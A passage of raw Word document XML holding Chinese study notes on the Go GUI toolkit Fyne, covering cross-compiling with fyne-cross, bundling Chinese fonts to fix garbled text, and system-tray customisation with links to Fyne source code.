          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就是使用跨平台的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>编译器在本机上编译，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>编译器编译，就是交叉编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75A3D7" w14:textId="77777777" w:rsidR="00C03C14" w:rsidRPr="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E467BD2" w14:textId="07AB14F7" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fyne-cross</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CD4604" w14:textId="7EC08EF6" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C03C14">
        <w:t>go install github.com/fyne-io/fyne-cross@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D79304" w14:textId="77777777" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D5623A" w14:textId="222CEBBE" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E1348" w14:textId="12017122" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C03C14">
        <w:t>http://developer.fyne.io/started/cross-compiling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07239A47" w14:textId="77777777" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D708048" w14:textId="77777777" w:rsidR="00704B19" w:rsidRDefault="00704B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B5B4F6" w14:textId="03D8A221" w:rsidR="00704B19" w:rsidRDefault="00704B19" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>美观部分（仅用于美化部分的、不太重要的知识）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926F78A" w14:textId="77777777" w:rsidR="00704B19" w:rsidRDefault="00704B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633518B3" w14:textId="19C523EE" w:rsidR="00704B19" w:rsidRPr="00704B19" w:rsidRDefault="00704B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00704B19">
        <w:t>fyne.io\fyne@v1.4.3\theme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A1514" w14:textId="77777777" w:rsidR="00704B19" w:rsidRDefault="00704B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031872B6" w14:textId="527F2807" w:rsidR="00704B19" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中文乱码问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议不用此节，还是直接用英文的较省时间</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628D073" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558BDBE5" w14:textId="15CBE560" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002E04B4">
        <w:t>https://www.bilibili.com/video/BV1jt4y1x7ov/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C9CFC" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E72AB9" w14:textId="21B1FB7D" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代开如下目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63C751" w14:textId="77ED022E" w:rsidR="002E04B4" w:rsidRPr="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002E04B4">
        <w:t>C:\Windows\Fonts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73227BCB" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EC0E5C" w14:textId="035B9B17" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把自己想用的字体文件直接拷贝到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目目录下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08B18C" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63064CE9" w14:textId="399D66A6" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> go install </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidRPr="00EE4398">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>fyne.io/fyne/v2/cmd/fyne@lastest</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B705EF3" w14:textId="116FD9A4" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则会打包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>tf-16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336E59A2" w14:textId="308CFA70" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>yne bundle msyh.ttc &gt;&gt; bundled.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872A5D5" w14:textId="7B741D17" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包粗体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534196C3" w14:textId="52A8872F" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>yne bundle -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> msyhbd.ttc &gt;&gt; bundled.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB6A2B" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRPr="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750FF66F" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED304A6" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6C8E75" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4773519F" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165F41E5" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRPr="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F45D16D" w14:textId="77777777" w:rsidR="002E04B4" w:rsidRDefault="002E04B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D477103" w14:textId="76EC60A3" w:rsidR="00A12348" w:rsidRDefault="00A12348" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>yne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>托盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76985422" w14:textId="77777777" w:rsidR="00A12348" w:rsidRDefault="00A12348" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6027C23A" w14:textId="3C31ED53" w:rsidR="00A12348" w:rsidRDefault="00A12348" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12348">
        <w:t>https://docs.fyne.io/explore/systray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F572922" w14:textId="7A44F2C9" w:rsidR="00A12348" w:rsidRDefault="009822CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidRPr="00251149">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/fyne-io/systray/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（该项目是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="009822CF">
        <w:t>github.com/getlantern/systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目，可以集成入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的托盘程序）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A5BFF0" w14:textId="77777777" w:rsidR="007B03D0" w:rsidRDefault="007B03D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020D9A19" w14:textId="168517AC" w:rsidR="007B03D0" w:rsidRDefault="007B03D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B03D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>？待研究</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从如下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可以非常直观看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的相关代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C461E2" w14:textId="30E40A6E" w:rsidR="007B03D0" w:rsidRPr="00A12348" w:rsidRDefault="007B03D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B03D0">
        <w:lastRenderedPageBreak/>
        <w:t>https://github.com/fyne-io/systray/blob/master/example/main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB2931" w14:textId="3C6D28C4" w:rsidR="00A12348" w:rsidRDefault="007B03D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此我认为，</w:t>
      </w:r>
      <w:r w:rsidRPr="007B03D0">
        <w:t>desk.SetSystemTrayMenu(m)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的部分还可以更多的自定义，就如原生的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样，可以修改</w:t>
      </w:r>
      <w:r w:rsidRPr="007B03D0">
        <w:t>desk.SetSystemTrayMenu(m)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分的代码来让托盘更加自定义化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5E43F" w14:textId="00E6CEDA" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的原处找到</w:t>
      </w:r>
      <w:r w:rsidRPr="007B03D0">
        <w:t>SetSystemTrayMenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的定义部分（调用链）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE5774D" w14:textId="6B861154" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0019694E">
        <w:t>https://github.com/search?q=repo%3Afyne-io/fyne%20SetSystemTrayMenu&amp;type=code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B591E0" w14:textId="1F16982A" w:rsidR="007B03D0" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId121" w:anchor="L87" w:history="1">
        <w:r w:rsidRPr="00EE4398">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/fyne-io/fyne/blob/e332a5e47813bff1af9631cbbfe84654c0143189/app/app_windows.go#L87</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0650603A" w14:textId="77777777" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C48A89" w14:textId="7A05C0EF" w:rsidR="0019694E" w:rsidRPr="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8399B8" w14:textId="117FFD7D" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0019694E">
        <w:t>https://github.com/fyne-io/fyne/blob/e332a5e47813bff1af9631cbbfe84654c0143189/internal/driver/glfw/driver_desktop.go#L38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCAA23" w14:textId="77777777" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07477467" w14:textId="0562E816" w:rsidR="0019694E" w:rsidRDefault="00B10D3D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB4A58" w14:textId="1FED4205" w:rsidR="0019694E" w:rsidRDefault="00B10D3D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还没看完，再找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调用链，因为作者出于设计模式的考虑，太多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，明天找一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03CE20" w14:textId="77777777" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D76D75" w14:textId="77777777" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3C1CEE" w14:textId="77777777" w:rsidR="0019694E" w:rsidRDefault="0019694E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="678F663A" w14:textId="77777777" w:rsidR="007B03D0" w:rsidRDefault="007B03D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46ECF838" w14:textId="5F70C28A" w:rsidR="009822CF" w:rsidRDefault="009822CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考代码如：（</w:t>
      </w:r>
      <w:r w:rsidRPr="009822CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>代码使用方法完全区别于</w:t>
      </w:r>
      <w:r w:rsidRPr="009822CF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>github.com/getlantern/systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B432F38" w14:textId="46804F36" w:rsidR="003A66F1" w:rsidRPr="003A66F1" w:rsidRDefault="003A66F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>打包必须是：</w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28730EEB" w14:textId="77777777" w:rsidR="003A66F1" w:rsidRDefault="003A66F1" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pP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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>echo off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
